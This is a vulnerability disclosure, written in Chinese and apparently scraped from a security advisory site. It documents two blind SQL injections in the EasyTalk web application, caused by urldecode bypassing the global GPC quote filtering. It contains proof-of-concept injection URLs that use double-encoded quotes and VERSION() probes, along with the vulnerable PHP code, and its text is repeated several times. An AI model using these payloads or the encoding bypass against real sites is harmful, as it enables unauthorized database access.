### 简要描述: easytalk两枚sql盲注 ### 详细说明: 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecode(trim(htmlspecialchars($_REQUEST['keyword']))); keyword参数进行了urldecode操作。绕过全局gpc的过滤,导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据 [<img src="https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg" alt="QQ截图20141008120750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg) http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg" alt="QQ截图20141008120808.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg) 无数据返回...
### 简要描述: easytalk两枚sql盲注 ### 详细说明: 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecode(trim(htmlspecialchars($_REQUEST['keyword']))); keyword参数进行了urldecode操作。由于解码发生在全局gpc过滤之后，过滤时仍为%27形式的字符会被还原为单引号并直接拼接进SQL，从而绕过全局gpc的过滤，导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据 [<img src="https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg" alt="QQ截图20141008120750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg) http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg" alt="QQ截图20141008120808.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg) 无数据返回 2. http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 原理同上。urldecode导致绕过全局gpc，解码后的keyword被直接拼接进where条件。 ``` public function topic() { $keyword=$this->_get('keyword','urldecode'); if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find(); if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } $this->assign('comefrom','topic'); $this->assign('keyword',$keyword); $this->assign('topic',$topic); $this->assign('topicusers',$topicusers); $this->assign('isfollow',$isfollow); $this->assign('subname','#'.$keyword.'#'); $this->display(); } else { header("location:".SITE_URL.'/?m=topic&a=index'); } } ``` 
http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 [<img src="https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg" alt="QQ截图20141008121147.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg) http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg" alt="QQ截图20141008121203.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg) ### 漏洞证明: 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecode(trim(htmlspecialchars($_REQUEST['keyword']))); keyword参数进行了urldecode操作。绕过全局gpc的过滤,导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据 [<img src="https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg" alt="QQ截图20141008120750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg) http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg" alt="QQ截图20141008120808.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg) 无数据返回 2,http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 原理同上。urldecode导致绕过全局gpc ``` public function topic() { $keyword=$this->_get('keyword','urldecode'); if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find(); if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); 
$topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } $this->assign('comefrom','topic'); $this->assign('keyword',$keyword); $this->assign('topic',$topic); $this->assign('topicusers',$topicusers); $this->assign('isfollow',$isfollow); $this->assign('subname','#'.$keyword.'#'); $this->display(); } else { header("location:".SITE_URL.'/?m=topic&a=index'); } } ``` http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 [<img src="https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg" alt="QQ截图20141008121147.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg) http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg" alt="QQ截图20141008121203.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg)